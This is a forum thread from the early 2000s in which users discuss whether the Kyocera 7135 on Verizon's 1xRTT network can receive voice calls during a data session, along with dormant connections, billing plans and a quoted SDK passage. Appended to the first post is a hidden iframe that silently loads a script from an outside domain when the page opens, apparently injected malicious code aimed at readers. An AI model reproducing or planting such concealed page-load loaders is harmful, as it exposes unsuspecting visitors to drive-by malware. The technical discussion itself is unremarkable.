+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 25
  1. #1
    Registered User asmoore's Avatar
    Join Date
    07-03-2003
    Location
    Salt Lake City, UT
    Posts
    93

    Simultaneous Voice & Data

    I am doing some research for work and after talking to a AT&T rep and visiting their website . Under "The Advantages..." section, it states that you can receive voice calls while in a data session. I have only seen one person with this phone, but that was before I knew about the simultaneous capability. Does anyone have any information that can shed some light on this.

    I know the 7135 is packet based and can be dormant. Is this what they are really talking about???

    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    12-27-2002
    Posts
    54
    AT&T's Pocket phone is GSM and the data is GPRS. It's not packet based like 1XRTT (which the 7135 utilizes). Different technology.

  3. #3
    Registered User
    Join Date
    01-03-2003
    Posts
    6

    Does the 7135 have always on internet?

    is it always on, or do you have to connect and disconnect? my carrier would be verizon, if that matters.

    thanks,
    ben

  4. #4
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    I am on Verizon using Netexpress. However, since I didn't order their combination of unlimited Netexpress with a voice plan I haven't tried leaving it connected, so I connect and disconnect. Otherwise you get charged for the minutes. I don't know if I let the connection go dormant whether I could then receive a voice call. I tried making a voice call to the phone when it was connected and I get dumped to the voice mailbox.

    Has anyone tried or been able to set up the phone so you can be connected on the data side and still use the phone for calls?

    John
    John

    For more information see barJohn Reviews It

  5. #5
    Registered User
    Join Date
    01-05-2003
    Posts
    63
    With either Express Network or "mobile web" (whatever they call it, the one that uses the slow modem), you are not always on. You connect when necessary. Express Network connects very fast though and the connect stays open but dormant for a while so further Internet work within a short time is not supposed to require reconnection.

    In reality I have not connected as a discreet step using Express Network -- the system automatically does this and it takes perhaps 3 to 5 seconds.

  6. #6
    Registered User
    Join Date
    01-03-2003
    Posts
    6
    ok, thanks. if the connection is fast and the system connects automatically when you try to use the internet, that's good enough for me.

  7. #7
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    Yes but if you forget to disconnect (some apps do not automatically disconnect) you will have used minutes in your plan that you will be charged for. I think it will automatically disconnect you after 5 minutes of inactivity but that is 5 more minutes gone!

    John
    John

    For more information see barJohn Reviews It

  8. #8
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    just to compare,

    sprint has an always on conection, but will go dormant. you are not being billed for any data as long as you are not using any applications that need internet connectivity, so there is no need to disconnnect. i thought verizon was this way also?! you have upload/download arrows that graphhically show you if you are using data or not....

  9. #9
    Registered User
    Join Date
    08-03-2003
    Posts
    91
    Originally posted by marctronixx
    just to compare,

    ... i thought verizon was this way also?! you have upload/download arrows that graphhically show you if you are using data or not....
    Eventually even the dormant connection with disconnect. It also appears as if you just missed a call from 'Unavailable'. Not a big deal if you remember that you had a dormant connection.

    Had me wondering why I kept missing calls because my office phone will try to call my cell and it shows up as 'Unavailable'. I finally saw it disconnect with the missed call message the other day. Mystery solved.

    Andy

  10. #10
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    Can anyone answer the original question as to whether one can receive voice and data concurrently on Verizon/CDMA?

    Thanks,

    John
    John

    For more information see barJohn Reviews It

  11. #11
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by barjohn
    Can anyone answer the original question as to whether one can receive voice and data concurrently on Verizon/CDMA?

    Thanks,

    John
    If you are activly sending/receiving data, your call will go to voice mail. About 15 seconds after receiving data, the phone will "go dorment". While dorment, you can receive a call, and when the call finishes, you will be returned to the dorment mode. After about 5 minutes in dorment mode, Verizon will disconnect the data call completly, and the next time you need data, you will need to wait while it re-establishes the connection (~ 15 seconds). Also, if you close the phone or your Palm turns off from the self timer, it will disconnect the data call. Interestingly enough, last night, Verizon was not disconnecting my dorment data calls while my phone was in the cradle and open. I stayed connected for about 3 hours. Today, they are back to disconnecting me.

    Alan

  12. #12
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by marctronixx
    just to compare,

    sprint has an always on conection, but will go dormant. you are not being billed for any data as long as you are not using any applications that need internet connectivity, so there is no need to disconnnect. i thought verizon was this way also?! you have upload/download arrows that graphhically show you if you are using data or not....
    With some differences, Verizon is that way on the megabyte or unlimited plans, but not onthe data minutes plans.

    Alan

  13. #13
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Originally posted by alanb
    After about 5 minutes in dorment mode, Verizon will disconnect the data call completly, and the next time you need data, you will need to wait while it re-establishes the connection (~ 15 seconds). Also, if you close the phone or your Palm turns off from the self timer, it will disconnect the data call. Interestingly enough, last night, Verizon was not disconnecting my dorment data calls while my phone was in the cradle and open. I stayed connected for about 3 hours. Today, they are back to disconnecting me.
    That's interesting.... Since I don't have the phone yet, total speculation , but could the phone be doing the disconnection, as part of a power-saving feature? I.e., could there be a setting (or a "feature", like the lower-volume ring in cradle) that affects holding a dormant session based on whether the phone is in the cradle or operating on battery? Has anyone tested in those different states?

  14. #14
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    you can have the connection time out to set times in the connection app in connection prefs (i believe). i dont think the phone is smart eunff to disconnect the conection depending on where it is (cradle, etc..) some folks, like me, may want to use the data network whilst the phone is in the cradle, and i would not want it to disconect because of that...

    specualtion and opinions also..

  15. #15
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by turboCat
    That's interesting.... Since I don't have the phone yet, total speculation , but could the phone be doing the disconnection, as part of a power-saving feature? I.e., could there be a setting (or a "feature", like the lower-volume ring in cradle) that affects holding a dormant session based on whether the phone is in the cradle or operating on battery? Has anyone tested in those different states?
    The phone can in fact be set to time out, but that isn't what is doing it (I have that feature disabled). It is in the small print on the Express Network service descriptions on Verizon's web site. They say they will time out idle connections after five minutes.

    Alan

  16. #16
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Express Network packages are billed by the byte, not minutes, so you shouldn't worry.

  17. #17
    Registered User
    Join Date
    02-05-2003
    Location
    Riverside, CA
    Posts
    242
    That is not completely accurate. It depends on which plan you are on. They have 3different NetExpress plans. Only the first includes voice and it bills data by the minute. The next plans is unlimited data but no voice and the last plan is based on megabytes and no voice. You can combine a voice plan with the unlimited data plan but not with any other plan such as the megabyte plan. Go figure! Otherwise I would selcet the Nationwide Single rate voice plan and add the 10MB plan for data.

    John
    John

    For more information see barJohn Reviews It

  18. #18
    Registered User
    Join Date
    10-03-2002
    Posts
    201
    Originally posted by barjohn
    That is not completely accurate. It depends on which plan you are on. They have 3different NetExpress plans. Only the first includes voice and it bills data by the minute. The next plans is unlimited data but no voice and the last plan is based on megabytes and no voice. You can combine a voice plan with the unlimited data plan but not with any other plan such as the megabyte plan. Go figure! Otherwise I would selcet the Nationwide Single rate voice plan and add the 10MB plan for data.

    John
    John,

    And there is one other option -- the "Express Network" plans that include voice and Express Network minutes, and no roaming billed by the minute (combined voice & data minutes). Not really a bad deal if you are a heavy business traveller -- but no nights and weekends, etc.

    Glenn

  19. #19
    Registered User
    Join Date
    10-03-2002
    Posts
    201
    Originally posted by bones boy
    AT&T's Pocket phone is GSM and the data is GPRS. It's not packet based like 1XRTT (which the 7135 utilizes). Different technology.
    Bones boy,

    This is incorrect. GSM GPRS connections can stay connected while you take voice calls, and it is done allot more elegantly than the "dormant" feature with 5 minute disconnect from Verizon/CDMA. However, GSM providers (T-Mobile, AT&T) only charge by the byte with no unlimited plans and the speed is only about 40K.

    You can leave a GPRS connection active as long as you want -- it is true packet based radio. I know that CDMA's 1XRTT is called “packet based” -- but it seems to me that it just hangs up and reconnects as needed.

    In addition, the 7135's "dormant" feature is so buggy that this is pretty much useless except that it will save your battery. If you switch apps or take a voice call while “dormant” the phone will probably crash or shut off (at least that has been my experience).

    One noteworthy thing about the dormant feature is that you can have a VPN connection from your laptop, the phone can go dormant (save power) and then when data is sent it will come back on with the same IP, etc so you don't loose the tunnel. But there is a 1-2 second delay. GPRS doesn't have the delay.

    Glenn

  20. #20
    Registered User
    Join Date
    03-03-2002
    Posts
    204

    1xRTT on 7135?

    Hi all,

    With all the 1xRTT phones I've seen on my provider, 1xRTT service is just like dialup (qnc) except it's faster and you have a username and password. You can't talk on the phone and have data running at the same time. But reading the Kyocera SDK Manual this is what it says about 3G Data, it definitely sounds like it's always on and there's no need to "connect". What's the deal here?


    3G Packet Data
    The 3G packet data service supports up to 153 kpbs data rate. Unlike QNC or
    2G data services, this service only keeps the “data call” up while transmitting
    Kyocera 7135 API, Version 1.0 About the Kyocera 7135
    data packets. Developers can think of 2G as analogous to a traditional land line
    modem, and 3G as an “always on” cable modem. There are four states associated with
    packet data: active, dormant, unavailable and disconnected.
    • Unavailable: The phone is in an area where 3G coverage is unavailable. 2G data
    may still be available in the form of QNC data connections.
    • Disconnected: A 3G data call was just disconnected.
    • Dormant: State of the phone if no data activity has taken place for some time as
    determined by the base station. If any data requests are made by the application,
    the phone comes out of dormancy and resumes an active session. The difference
    between getting to an active state from dormant mode or from disconnected mode
    is that the PPP stack on the device is active in a dormant session; only the physical
    link needs to be re-established.
    • Active: An active data call is in progress and charges will apply to the call.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts